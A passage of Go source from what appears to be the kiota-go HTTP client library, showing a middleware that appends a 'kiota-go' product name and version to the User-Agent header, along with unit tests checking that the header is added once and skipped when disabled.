41 | func NewUserAgentHandlerOptions() *UserAgentHandlerOptions { 42 | return &UserAgentHandlerOptions{ 43 | Enabled: true, 44 | ProductName: "kiota-go", 45 | /** The package version */ 46 | // x-release-please-start-version 47 | ProductVersion: "1.5.3", 48 | // x-release-please-end 49 | } 50 | } 51 | 52 | var userAgentKeyValue = abs.RequestOptionKey{ 53 | Key: "UserAgentHandler", 54 | } 55 | 56 | type userAgentHandlerOptionsInt interface { 57 | abs.RequestOption 58 | GetEnabled() bool 59 | GetProductName() string 60 | GetProductVersion() string 61 | } 62 | 63 | // GetKey returns the key value to be used when the option is added to the request context 64 | func (options *UserAgentHandlerOptions) GetKey() abs.RequestOptionKey { 65 | return userAgentKeyValue 66 | } 67 | 68 | // GetEnabled returns the value of the enabled property 69 | func (options *UserAgentHandlerOptions) GetEnabled() bool { 70 | return options.Enabled 71 | } 72 | 73 | // GetProductName returns the value of the product name property 74 | func (options *UserAgentHandlerOptions) GetProductName() string { 75 | return options.ProductName 76 | } 77 | 78 | // GetProductVersion returns the value of the product version property 79 | func (options *UserAgentHandlerOptions) GetProductVersion() string { 80 | return options.ProductVersion 81 | } 82 | 83 | const userAgentHeaderKey = "User-Agent" 84 | 85 | func (middleware UserAgentHandler) Intercept(pipeline Pipeline, middlewareIndex int, req *nethttp.Request) (*nethttp.Response, error) { 86 | obsOptions := GetObservabilityOptionsFromRequest(req) 87 | if obsOptions != nil { 88 | observabilityName := obsOptions.GetTracerInstrumentationName() 89 | ctx := req.Context() 90 | ctx, span := otel.GetTracerProvider().Tracer(observabilityName).Start(ctx, "UserAgentHandler_Intercept") 91 | span.SetAttributes(attribute.Bool("com.microsoft.kiota.handler.useragent.enable", true)) 92 | defer span.End() 93 | req = req.WithContext(ctx) 94 | } 95 | options, ok := 
req.Context().Value(userAgentKeyValue).(userAgentHandlerOptionsInt) 96 | if !ok { 97 | options = &middleware.options 98 | } 99 | if options.GetEnabled() { 100 | additionalValue := fmt.Sprintf("%s/%s", options.GetProductName(), options.GetProductVersion()) 101 | currentValue := req.Header.Get(userAgentHeaderKey) 102 | if currentValue == "" { 103 | req.Header.Set(userAgentHeaderKey, additionalValue) 104 | } else if !strings.Contains(currentValue, additionalValue) { 105 | req.Header.Set(userAgentHeaderKey, fmt.Sprintf("%s %s", currentValue, additionalValue)) 106 | } 107 | } 108 | return pipeline.Next(req, middlewareIndex) 109 | } 110 | -------------------------------------------------------------------------------- /user_agent_handler_test.go: -------------------------------------------------------------------------------- 1 | package nethttplibrary 2 | 3 | import ( 4 | nethttp "net/http" 5 | httptest "net/http/httptest" 6 | "strings" 7 | "testing" 8 | 9 | "github.com/stretchr/testify/assert" 10 | ) 11 | 12 | func TestItAddsTheUserAgentHeader(t *testing.T) { 13 | handler := NewUserAgentHandler() 14 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 15 | res.WriteHeader(200) 16 | res.Write([]byte("body")) 17 | })) 18 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 19 | if err != nil { 20 | t.Error(err) 21 | } 22 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 23 | if err != nil { 24 | t.Error(err) 25 | } 26 | assert.NotNil(t, resp) 27 | assert.Equal(t, "kiota-go", strings.Split(req.Header.Get("User-Agent"), "/")[0]) 28 | } 29 | 30 | func TestItAddsTheUserAgentHeaderOnce(t *testing.T) { 31 | handler := NewUserAgentHandler() 32 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 33 | res.WriteHeader(200) 34 | res.Write([]byte("body")) 35 | })) 36 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, 
nil) 37 | if err != nil { 38 | t.Error(err) 39 | } 40 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 41 | if err != nil { 42 | t.Error(err) 43 | } 44 | resp, err = handler.Intercept(newNoopPipeline(), 0, req) 45 | if err != nil { 46 | t.Error(err) 47 | } 48 | assert.NotNil(t, resp) 49 | assert.Equal(t, 1, len(strings.Split(req.Header.Get("User-Agent"), "kiota-go"))-1) 50 | } 51 | 52 | func TestItDoesNotAddTheUserAgentHeaderWhenDisabled(t *testing.T) { 53 | options := NewUserAgentHandlerOptions() 54 | options.Enabled = false 55 | handler := NewUserAgentHandlerWithOptions(options) 56 | testServer := httptest.NewServer(nethttp.HandlerFunc(func(res nethttp.ResponseWriter, req *nethttp.Request) { 57 | res.WriteHeader(200) 58 | res.Write([]byte("body")) 59 | })) 60 | req, err := nethttp.NewRequest(nethttp.MethodGet, testServer.URL, nil) 61 | if err != nil { 62 | t.Error(err) 63 | } 64 | resp, err := handler.Intercept(newNoopPipeline(), 0, req) 65 | if err != nil { 66 | t.Error(err) 67 | } 68 | resp, err = handler.Intercept(newNoopPipeline(), 0, req) 69 | if err != nil { 70 | t.Error(err) 71 | } 72 | assert.NotNil(t, resp) 73 | assert.Equal(t, false, strings.Contains(req.Header.Get("User-Agent"), "kiota-go")) 74 | } 75 | --------------------------------------------------------------------------------